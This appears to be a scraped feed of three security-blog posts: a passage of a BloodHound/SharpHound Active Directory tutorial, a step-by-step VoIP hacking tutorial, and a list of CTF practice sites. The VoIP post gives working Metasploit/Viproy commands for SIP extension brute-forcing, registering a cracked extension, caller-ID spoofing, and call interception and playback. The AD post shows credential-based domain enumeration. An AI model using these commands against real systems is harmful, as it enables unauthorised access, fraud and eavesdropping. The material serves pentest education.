During startup, the following message will appear: “Remote control interface is available at: http://localhost:7474/”. Open that address in the browser available in Kali.

The tool will ask us for a username and password when connecting to the database. In this case, pentesting experts use “neo4j:neo4j”. There’s nothing else to do here. Now, in another window, run Bloodhound directly:

$ bloodhound

Log in and you will reach the application desktop.

The database is empty. Now we need to load Active Directory data into it.

Collect data from a domain

Next we will need a collector and a domain user account, as mentioned by pentesting experts:

  • The collector can be downloaded here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
  • Take any domain account that is available. There are various methods for obtaining valid accounts; one option is to run Responder and collect NetNTLMv2 hashes. You can also use SMB.

In this case, the SharpHound collector was downloaded; it must be executed as a domain user. This can be done from a host that is not joined to the scanned domain.

Open the command prompt as an administrator and run the following command:

runas /netonly /user:domain\login cmd.exe

You will be prompted for the user’s password.

If the credentials are correct, we will see a new command line session, the title of which will be the name of our user:

Then, in this session, we launch our collector, specifying the domain name. Note that the DNS for this domain must be configured so that it can be resolved by name.

sharphound.exe -d <domain name>

When the data collection is complete, we will see the file with the corresponding name, indicated in the program output. This is the file we need to import into Bloodhound, pentesting specialists mention.

What information will we get?

Click the “Load Data” button in Bloodhound.

Select the file created in the previous step and open it.

The import process then runs.

When the import is complete, you can go to the “Analysis” tab and select one of the ready-made queries. Pentesting experts recommend starting with “Find Shortest Paths to Domain Admins”, which finds the shortest path to a domain administrator.

The corresponding chart is created automatically. On closer inspection, you may find something interesting. For example, a user **** USER9, who is a member of the Domain Admins group, was discovered immediately. It is not yet clear whether this is a misconfiguration or was left deliberately, but it is a clear sample of how the tool works.

Bloodhound has many prepared queries and analyses, pentesting experts mention. You can create your own charts and mark important nodes to reach the goal of this tutorial: capturing the target domain.
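To make clear what the “shortest path” chart is computing, here is an added Python example (not BloodHound’s own code) that runs a breadth-first search over a small, constructed Active Directory graph using the relationship types SharpHound collects (MemberOf, AdminTo, HasSession). The domain, computer and user names are placeholders; USER9 is modelled as a direct Domain Admins member, as in the text.

```python
"""BFS over a constructed AD graph: shortest path from each user to the
Domain Admins group, the idea behind "Find Shortest Paths to Domain Admins"."""
from collections import deque

DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"      # placeholder domain

# Constructed edges (source, relationship, target), in BloodHound's direction:
#   user/group -MemberOf-> group, principal -AdminTo-> computer,
#   computer -HasSession-> user (that user's credentials are reachable there).
EDGES = [
    ("USER9@CORP.LOCAL", "MemberOf", DOMAIN_ADMINS),            # direct member, like USER9 above
    ("USER3@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "USER9@CORP.LOCAL"),      # a domain admin is logged on to WS01
    ("USER5@CORP.LOCAL", "MemberOf", "DOMAIN USERS@CORP.LOCAL"),
]
USERS = ["USER3@CORP.LOCAL", "USER5@CORP.LOCAL", "USER9@CORP.LOCAL"]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def shortest_path(adj, start, goal):
    """BFS from start to goal; returns the hops as (node, relationship, node)
    triples in order, or None when goal is unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            hops = []
            while prev[node] is not None:       # walk back to the start
                parent, rel = prev[node]
                hops.append((parent, rel, node))
                node = parent
            return hops[::-1]
        for rel, nxt in adj.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


def paths_to_domain_admins(edges, users, group=DOMAIN_ADMINS):
    """Shortest path from each user to the Domain Admins group (None if none)."""
    adj = build_graph(edges)
    return {user: shortest_path(adj, user, group) for user in users}


def render(path):
    """Readable chain such as 'USER3 -MemberOf-> HELPDESK -AdminTo-> WS01 ...'."""
    if not path:
        return "no path"
    return path[0][0] + "".join(f" -{rel}-> {dst}" for _, rel, dst in path)


if __name__ == "__main__":
    for user, path in paths_to_domain_admins(EDGES, USERS).items():
        print(f"{user}: {render(path)}")
```

A four-hop chain like USER3’s (group membership, local admin rights, a cached admin session) is exactly the kind of path that is worth fixing before it shows up in an attacker’s chart.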

This is a tool that can be very useful to both administrators and pentesting experts; Remember that this article was prepared for academic purposes, so IICS is not responsible for the misuse that may be given to Bloodhound. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to pentest an Active Directory server? appeared first on Information Security Newspaper | Hacking News.

How to do pentesting of VoIP servers? Step by step tutorial for hacking VoIP networks https://www.securitynewspaper.com/2021/05/03/how-to-do-pentesting-of-voip-servers-step-by-step-tutorial-for-hacking-voip-networks/ Mon, 03 May 2021 23:33:47 +0000

The adoption of Voice over Internet Protocol (VoIP) technology is growing, allowing organizations to communicate over huge distances with ease. However, most organizations ignore the potential security flaws associated with using this technology.

This time, pentesting specialists from the International Institute of Cyber Security (IICS) will show you various methods to search for information about VoIP devices and prevent multiple attacks.

What is VoIP?

Before starting, let’s recall some details about this technology. According to pentesting experts, a VoIP implementation allows audio calls to be made over an Internet connection instead of a conventional phone line. Some VoIP gateway providers may allow you to call others who have a phone number, including local, long-distance, mobile, and international numbers.

By default, VoIP uses port 5060 for SIP signaling, which is used to register phones (for example, Cisco, Polycom, etc.).

Among the most important features of VoIP are:

  • Use of multiple lines
  • Voicemail service
  • Voice recording
  • Call log
  • Modular configurations

SIP Protocol

Session Initiation Protocol (SIP) allows users to establish, terminate, or modify voice or video calls. According to pentesting experts, the voice or video traffic itself is transmitted via the Real-time Transport Protocol (RTP). SIP is an application-layer protocol that uses UDP or TCP for transport. By default, SIP uses UDP/TCP port 5060 for unencrypted traffic or 5061 for TLS-encrypted traffic.

As we’ll see later, there are Man-in-The-Middle (MiTM) attack vectors for VoIP implementations. According to pentesting specialists, the signaling protocol is ASCII-based and very similar to HTTP in that it uses a request/response model. Requests from a SIP client are addressed to a SIP URI and sent through a user agent.

SIP responses

We can understand the responses from their status codes. The general categories of response codes are shown below:

  • 1xx (informational)
  • 2xx (success)
  • 3xx (redirection)
  • 4xx (failed requests)
  • 5xx (the server cannot complete the request)
  • 6xx (global errors)

SIP interoperability structure

A typical SIP call flow consists of the following steps:

  • The sender initiates an INVITE request
  • The recipient side answers 100 (Trying)
  • A 180 (Ringing) response is sent while the callee’s phone rings
  • The receiver picks up the phone and a 200 (OK) response is sent
  • The initiator sends an ACK
  • The call proceeds using RTP
  • A BYE request is sent to end the call

Real-Time Transport Protocol (RTP)

This is the network protocol for streaming audio and video. RTP is used in communications and entertainment systems that involve streaming media, such as telephony, mobile apps and video conferencing. The standard RTP port range is 16384 to 32767; these ports are used for SIP calls. In this case, pentesting experts use the UDP port range 10000-20000 for video, voice, and RTP media stream channels.

Configuration used in this tutorial

  • Operating system: Kali Linux 2020.1
  • IP address: 192.168.1.4
  • Target: Trixbox
  • VoIP client: Zoiper
  • Client IP address: 192.168.1.7

Setting up the Viproy VoIP kit

Before starting the pentesting process, we need to add the Viproy VoIP kit to our Metasploit installation, which requires a few dependencies. We will first update the package sources and then install the following dependencies:

sudo apt update && sudo apt install -y git autoconf build-essential libcap-dev libpq-dev zlib1g-dev libsqlite3-dev

Once all dependencies have been installed, it’s time to clone the Viproy repository onto the Kali Linux system. It contains the modules that we need to add to our Metasploit.

git clone https://github.com/fozavci/viproy-VoIPkit.git

Inside we see a lib directory, a modules directory and a kaliinstall script. Before running the script, pentesting experts recommend manually copying the contents of the lib and modules directories into the Metasploit lib and modules directories, respectively.

cp lib/msf/core/auxiliary/* /usr/share/metasploit-framework/lib/msf/core/auxiliary/
cp modules/auxiliary/VoIP/viproy-VoIPkit* /usr/share/metasploit-framework/modules/auxiliary/VoIP/
cp modules/auxiliary/spoof/cisco/viproy-VoIPkit_cdp.rb /usr/share/metasploit-framework/modules/auxiliary/spoof/cisco/

Now we need to register the libraries we copied in the mixins.rb file located in /usr/share/metasploit-framework/lib/msf/core/auxiliary/.

echo "require 'msf/core/auxiliary/sip'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/skinny'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb
echo "require 'msf/core/auxiliary/msrp'" >> /usr/share/metasploit-framework/lib/msf/core/auxiliary/mixins.rb

This can also be done manually with a text editor, pentesting experts mention. Next, we clone the precompiled version from GitHub.

git clone https://github.com/fozavci/metasploit-framework-with-viproy-VoIPkit.git

Then we go into the directory and install Viproy using gem.

cd metasploit-framework-with-viproy-VoIPkit/
gem install bundler
bundle install

This will take a little time. After that, we have to reload the modules in msfconsole:

reload_all

This completes the installation of the Viproy toolkit, so now you can start pentesting your target VoIP server. In a VoIP network, useful information can be found on VoIP gateways or servers, IP-PBX systems, VoIP client/phone software, and user extensions. Let’s take a look at some of the most commonly used fingerprinting and enumeration tools.

SIP Server Recognition

Using the Metasploit SIP scanner module to identify systems, by providing a single IP or a range of IP addresses, pentesting experts can scan for all VoIP servers and their enabled options.

use auxiliary/scanner/sip/options
set rhosts 192.168.1.0/24
run

Here we can see that the scan finds a VoIP server running on 192.168.1.7. We can also see that its User-Agent is “Asterisk” and that it has multiple request methods enabled.

Brute force attack

It is then possible to run a brute-force attack against the target server to extract its passwords. In this example, pentesting experts created a username dictionary and a password dictionary. The next step is to define the extension range, for which we select 00000000 to 99999999, and finally launch the module.

use auxiliary/voip/viproy_sip_bruteforce
set rhosts 192.168.1.7
set minext 00000000
set maxext 99999999
set user_file /home/kali/user.txt
set pass_file /home/kali/pass.txt
exploit

Here we can see that 10 extensions have been extracted. We need to make sure that the secret created for each extension is hard to guess, which prevents brute-force attacks.

Additional work

Now it’s time to go one step further and register an extension so we can initiate calls from the attacker’s computer. We chose extension 99999999, whose secret we discovered to be 999. All we had to do was provide the server’s IP address, the extension and the secret.

As soon as we ran the auxiliary module, we received a 200 OK response from the server, which means the extension was registered with this IP address.

use auxiliary/voip/viproy_sip_register
set rhosts 192.168.1.7
set username 99999999
set password 999
run

We need to register here because we do not have a trunk line, PSTN line or PRI line for outgoing calls. Therefore, we are testing the extension by calling it.

Call spoofing

Here we can forge the caller ID at will. According to the pentesting experts, we need to set LOGIN to true so that we can log in to the server with secret 999. We also need to set NUMERIC_USERS to true so that numeric extensions are accepted.

use auxiliary/voip/viproy_sip_invite
set rhosts 192.168.1.7
set to 00000000
set from 99999999
set login true
set fromname hacker
set username 99999999
set password 999
set numeric_users true
run

As soon as we launch the auxiliary module, we will see a call from extension 99999999 to extension 00000000, which we configured in our Zoiper client. We can also see the caller ID “hacker” that we set in the auxiliary module.

Record monitoring

We can monitor the logs on the VoIP server, which contain information about all calls that were initiated, connected, and disconnected. According to the pentesting experts, you can try the default credentials. First we connect to the server using ssh and then run the following command to open the Asterisk console:

ssh 192.168.1.7
asterisk -rvvvvvvvvvvvvvvv

Track calls with Wireshark

When users initiate a phone call, hackers or researchers can monitor the intercepted SIP traffic using Wireshark. To do this, start Wireshark, select the network adapter on which the VoIP server’s traffic is seen, and start capturing packets. Looking more closely, you will see a tab in the Wireshark menu called “Telephony”; the first option in its drop-down menu is “VoIP Calls”.

As soon as we click on VoIP Calls, a window opens with all calls intercepted while listening. We see a sequence of packets from one IP address to another.

If we click the “Flow Sequence” button below, we can see the SIP handshake we covered in the introduction. A SIP call flow contains multiple SIP transactions. A SIP transaction consists of multiple requests and responses, and they are grouped into a transaction using the CSeq header (for example, CSeq: 103).

The first transaction registers the extension; after that, the trace corresponds to session setup. From extension 99999999, an INVITE request is sent to 00000000. The proxy immediately replies 100 TRYING to stop retransmissions and forwards the request to extension 00000000.

Extension 00000000 sends 180 RINGING when the phone starts ringing, and the proxy relays it to user A. Finally, a 200 OK message follows when extension 00000000 answers the call. The call server then assigns the RTP ports, and RTP transport starts with the SDP parameters (ports, addresses, codecs, etc.). The last transaction corresponds to the end of the session: a BYE request is sent to the proxy and then forwarded to extension 00000000.

That user responds with a 200 OK message to confirm that the last message was received successfully. The call was initiated by a user named hacker at extension 99999999 to extension 00000000. The duration of the call and its current state can be seen in the previous example. Wireshark collected the call packets, so we can now listen to the whole call: after disconnecting, we can replay the entire phone conversation.
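As an added example (not part of the original tutorial), the following Python code builds a constructed capture of the REGISTER / INVITE / BYE dialog described in the SIP call-flow section above, parses each message, groups the messages into transactions by Call-ID and CSeq the way the Wireshark flow view does, and pulls the negotiated RTP ports out of the SDP bodies. The extension numbers and server address mirror this lab; the Call-IDs, tags and RTP ports are made up.

```python
"""Parse a constructed SIP capture and group it into transactions by CSeq."""
import re
from collections import OrderedDict


def sip_message(start_line, cseq, call_id, to, body=""):
    """Build one SIP message with just the headers this example needs
    (a real UA also sends Via branches, Contact, Max-Forwards, ...)."""
    return (f"{start_line}\r\nVia: SIP/2.0/UDP 192.168.1.4:5060\r\n"
            f'From: "hacker" <sip:99999999@192.168.1.7>;tag=a1\r\n'
            f"To: <sip:{to}@192.168.1.7>\r\nCall-ID: {call_id}\r\nCSeq: {cseq}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


REG, CALL = "reg1@192.168.1.4", "call1@192.168.1.4"   # constructed Call-IDs
SDP_OFFER = "v=0\r\nm=audio 10000 RTP/AVP 0\r\n"        # caller's RTP port
SDP_ANSWER = "v=0\r\nm=audio 20000 RTP/AVP 0\r\n"       # callee's RTP port

# Constructed capture: (source, destination, raw message), in wire order.
CAPTURE = [
    ("ext 99999999", "proxy", sip_message("REGISTER sip:192.168.1.7 SIP/2.0", "1 REGISTER", REG, "99999999")),
    ("proxy", "ext 99999999", sip_message("SIP/2.0 200 OK", "1 REGISTER", REG, "99999999")),
    ("ext 99999999", "proxy", sip_message("INVITE sip:00000000@192.168.1.7 SIP/2.0", "103 INVITE", CALL, "00000000", SDP_OFFER)),
    ("proxy", "ext 99999999", sip_message("SIP/2.0 100 Trying", "103 INVITE", CALL, "00000000")),
    ("proxy", "ext 99999999", sip_message("SIP/2.0 180 Ringing", "103 INVITE", CALL, "00000000")),
    ("proxy", "ext 99999999", sip_message("SIP/2.0 200 OK", "103 INVITE", CALL, "00000000", SDP_ANSWER)),
    ("ext 99999999", "proxy", sip_message("ACK sip:00000000@192.168.1.7 SIP/2.0", "103 ACK", CALL, "00000000")),
    ("ext 99999999", "proxy", sip_message("BYE sip:00000000@192.168.1.7 SIP/2.0", "104 BYE", CALL, "00000000")),
    ("proxy", "ext 99999999", sip_message("SIP/2.0 200 OK", "104 BYE", CALL, "00000000")),
]


def parse_sip(raw):
    """Parse a SIP request or response into a dict (header names lower-cased)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    seq, _, seq_method = headers["cseq"].partition(" ")
    msg = {"cseq": int(seq), "cseq_method": seq_method,
           "call_id": headers["call-id"], "headers": headers, "body": body}
    status = re.match(r"SIP/2\.0 (\d{3}) (.+)", start)
    if status:                                   # SIP/2.0 <code> <reason>
        msg.update(kind="response", code=int(status.group(1)), reason=status.group(2))
    else:                                        # <METHOD> <Request-URI> SIP/2.0
        method, uri, _ = start.split(" ", 2)
        msg.update(kind="request", method=method, uri=uri)
    return msg


RESPONSE_CLASSES = {1: "provisional", 2: "success", 3: "redirect",
                    4: "client error", 5: "server failure", 6: "global failure"}


def response_class(code):
    """Map a status code to the 1xx..6xx category listed above."""
    return RESPONSE_CLASSES[code // 100]


def group_transactions(capture):
    """Group messages by (Call-ID, CSeq number). The ACK reuses the INVITE's
    sequence number (RFC 3261), so it lands in the INVITE group, as in the
    Wireshark flow; REGISTER and BYE each form their own transaction."""
    groups = OrderedDict()
    for src, dst, raw in capture:
        msg = parse_sip(raw)
        groups.setdefault((msg["call_id"], msg["cseq"]), []).append((src, dst, msg))
    return groups


def describe_transactions(groups):
    """Render each transaction as 'CSeq METHOD: step -> step -> ...'."""
    out = []
    for (_, cseq), msgs in groups.items():
        steps = [m["method"] if m["kind"] == "request" else f'{m["code"]} {m["reason"]}'
                 for _, _, m in msgs]
        out.append(f'{cseq} {msgs[0][2]["cseq_method"]}: ' + " -> ".join(steps))
    return out


def final_status(msgs):
    """Last final (>= 200) response code of a transaction, or None if pending."""
    finals = [m for _, _, m in msgs if m["kind"] == "response" and m["code"] >= 200]
    return finals[-1]["code"] if finals else None


def rtp_ports(capture):
    """RTP ports negotiated in the SDP bodies (offer in INVITE, answer in 200 OK)."""
    return [int(p) for _, _, raw in capture
            for p in re.findall(r"^m=audio (\d+)", parse_sip(raw)["body"], re.M)]


if __name__ == "__main__":
    for line in describe_transactions(group_transactions(CAPTURE)):
        print(line)
    print("RTP ports:", rtp_ports(CAPTURE))
```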

When we press the “Play Streams” button, we are asked for an output device, depending on the laptop’s audio driver. Then we can click Play and listen to the conversation that took place during this VoIP call.

Conclusions

Deploying a VoIP network without the right security controls is a very big risk. After a successful pentest, it becomes clear how risky the most common configurations of these systems can be, so specialists recommend that administrators seek advice on the best ways to deploy them. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to do pentesting of VoIP servers? Step by step tutorial for hacking VoIP networks appeared first on Information Security Newspaper | Hacking News.

50 CTF(CAPTURE THE FLAG) & PENTESTING WEBSITES TO PRACTICE YOUR HACKING & CYBERSECURITY SKILLS IN 2021 https://www.securitynewspaper.com/2021/03/12/50-ctfcapture-the-flag-pentesting-websites-to-practice-your-hacking-cybersecurity-skills-in-2021/ Fri, 12 Mar 2021 15:37:14 +0000

As with any other professional activity, in the world of ethical hacking practice makes perfect. Today there are thousands of ethical hackers analyzing databases, websites, mobile applications and other deployments for security vulnerabilities that could be exploited, all in order to notify administrators and, at best, get a bug bounty.

Finding vulnerabilities in the wild is a job that requires a lot of practice, so for security researchers the platforms and tools that allow them to develop their skills have become a very useful resource, although it is worth thinking about the best tools available.

This time, pentesting experts from the International Institute of Cyber Security (IICS) present a list of the best platforms for practicing and improving Capture the Flag (CTF) and hacking skills.

Hack the Box

This is one of the most important pentesting platforms in the world, with 127 vulnerable systems, 65 CTF tasks and multiple virtual implementations of hardcore Active Directory environments.

Over the past few years Hack the Box has become a popular tool among pentesting experts, as it features a convenient web interface for active VM instance management, extensive technical support and a constantly updated list of vulnerable hosts.

Web-Security Academy

This is a platform developed by the creators of Burp Suite very popular among vulnerability bounty hunters.

OWASP Juice Shop

This is a web application written in JavaScript for pentesting training purposes. This platform is full of security flaws designed for users to exploit, as a fantastic cybersecurity training method.

Pentesterlab

This is a platform that provides online labs dedicated to the deployment of penetration tests. This website offers a variety of free activities for all those interested in honing their pentesting skills.

Root-Me

This website allows you to improve your hacking skills, with over 200 exercises and 50 virtual environments.

VulnHub

This is a large library of virtual machines that presents an environment with pentesting exercises for all tastes and knowledge levels.

TryHackMe

This is a recently created platform that allows cybersecurity enthusiasts to get acquainted with very interesting topics. Unlike other self-taught platforms, TryHackMe employs all kinds of techniques to facilitate learning, accompanied by users throughout the process.

Hacker 101

This is a free didactic site for any hacking enthusiast backed by the renowned HackerOne Vulnerability Rewards platform.

PentestIt Laboratories

This is a platform operated from Russia as a large pentesting lab, allowing ethical hackers to develop their skills consistently.

Pentester Academy

In exchange for $249 USD per month, users of this platform can have multiple hands-on activities to develop their skills as ethical hackers and pentesting experts.

Attack & Defense

With over 2100 hacking activities, Attack & Defense users will be able to 100% develop their pentesting capabilities.

CTF Antichat

This is a platform with tasks focused on exploiting vulnerabilities and identifying indicators of compromise in the analyzed systems.

Avatao

Avatao has around 600 tasks and tutorials, more than 10 languages and a very complete vulnerability database.

Capture The Flag At UCF

This is another platform with multiple tasks in various areas of pentesting and ethical hacking.

Exploit Education

Exploit Education provides many resources that anyone can use to learn about vulnerability analysis, exploit development, pentesting, binary analysis and many other cybersecurity issues.

CSAW 365

This is a community of cybersecurity experts that allows you to share a lot of useful information for hacking.

Practical Pentest Labs

This is a large pentesting and exploiting lab on Windows systems available to those users willing to pay $43 USD per month.

Hack.Me

Hack.me is a great collection of vulnerable web applications to put your hacking skills into practice. All applications are provided by platform members and can each be launched in a sandbox.

XSS Game

This is a Google program designed to practice searching for XSS vulnerabilities.

Hackerdom

This platform was developed by the creators of RuCTF and contains a lot of useful material for pentesting experts.

Forkbomb

This Russian website contains thousands of free hacking tasks and is highly recommended for ethical hacking enthusiasts and pentesting specialists.

FreeHackQuest

This is another great teaching option for researchers to develop their skills.

Hacking-Lab

This is another online platform to learn about network security and ethical hacking. Hackers will be able to develop their forensic, cryptography and reverse engineering skills.

Enigma Group

Enigma Group contains over 300 hacking tasks with a focus on OWASP’s top 10 exploits. The site has nearly 48,000 active members and hosts Capture The Flag contests on a weekly basis.

CTFlearn

CTFlearn is a platform that allows hacking enthusiasts to put their skills into practice and compete with other researchers. This platform stores a wide set of free activities in all kinds of areas.

CTF Komodo

Komodo Consulting developed a platform completely focused on application hacking, allowing researchers to gain experience in vulnerability analysis.

RINGZER0 TEAM ONLINE

RingZer0 Team Online CTF offers over 200 challenges that will test your hacking skills in multiple areas, from cryptography, malware analysis to SQL injection and pentesting.

WeChall

This website aggregates about 61 active sites with Capture the Flag tasks divided into multiple difficulty levels.

Hack This Site

This is a free war games site for any user to test and improve their hacking skills, from basic tasks to complex analysis. This website also includes a forum for users to share their experiences with the ethical hacking and pentesting community.

W3CHALLS

W3Challs is a learning platform organized into a variety of categories, including hacking, war games, forensic analysis, cryptography, steganography and programming in multiple languages.

Game of Hacks

Game of Hacks displays a set of code snippets in a questionnaire with multiple options, among which users will need to identify the corresponding vulnerability.

WebGoat Project

This site is especially focused on training ethical hackers and pentesting experts. WebGoat is a cross-platform tool that can be run on any operating system with Apache Tomcat and Java SDK.

SQLI Labs

This platform allows users to test their SQL injection skills and has 65 tasks sorted according to their difficulty level.

PicoCTF

This is a very interesting resource with a lot of tasks and instructions for pentesting enthusiasts.

Defend the Web

This is an interactive security platform where researchers can improve their hacking skills. Defend the Web has over 60 levels of increasing difficulty that develop progressively more sophisticated skills.

OVERTHEWIRE

This is the ideal platform for all those interested in the theoretical study of information security regardless of their level of experience.

Even beginner hackers can find great guidance for solving practical issues in OverTheWire.

PWNABLE.TW

This is a war games website for hackers and pentesters to test their skills.

Command Challenge

This is a great option to develop your hacking skills.

IO

This is a war game from the creators of netgarage.org, a community where like-minded people share knowledge about security, artificial intelligence, virtual reality and more.

Google Gruyere

This Python-based platform offers both black hat and white hat pentesting and hacking exercises, so that experts can learn to think like both researchers and cybercriminals.

CTFTIME

While CTFtime is not a hacking site like the others on this list, it is a great resource to keep up with CTF competitions taking place around the world.

Mutillidae

This is a free open source platform for pentesting web applications. The application is provided as a PHP/MySQL instance for self-deployment.

Damn Vulnerable Web Application

This platform will be of great help to security professionals who wish to test their skills in a legal environment. Like the previous example, this application is provided as a PHP/MySQL instance for self-deployment.

bWAPP

This is a specialized open source web application that contains about 100 vulnerabilities classified according to the OWASP methodology.

Metasploitable 2

Metasploitable 2 is like a punching bag for pentesters and for tools like Metasploit and Nmap. All ports are open and all known vulnerabilities are present on this platform.

Metasploitable 3

This is a free virtual machine that allows users to simulate attacks using Metasploit. This is one of the favorite tools of cybersecurity specialists.

ThreatGEN: Red vs. Blue

This is an excellent platform to get into the world of war games and ethical hacking.

Hacknet

Hacknet is a hacking simulator with a computer terminal interface, presented in the form of a fun role-playing game.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post 50 CTF(CAPTURE THE FLAG) & PENTESTING WEBSITES TO PRACTICE YOUR HACKING & CYBERSECURITY SKILLS IN 2021 appeared first on Information Security Newspaper | Hacking News.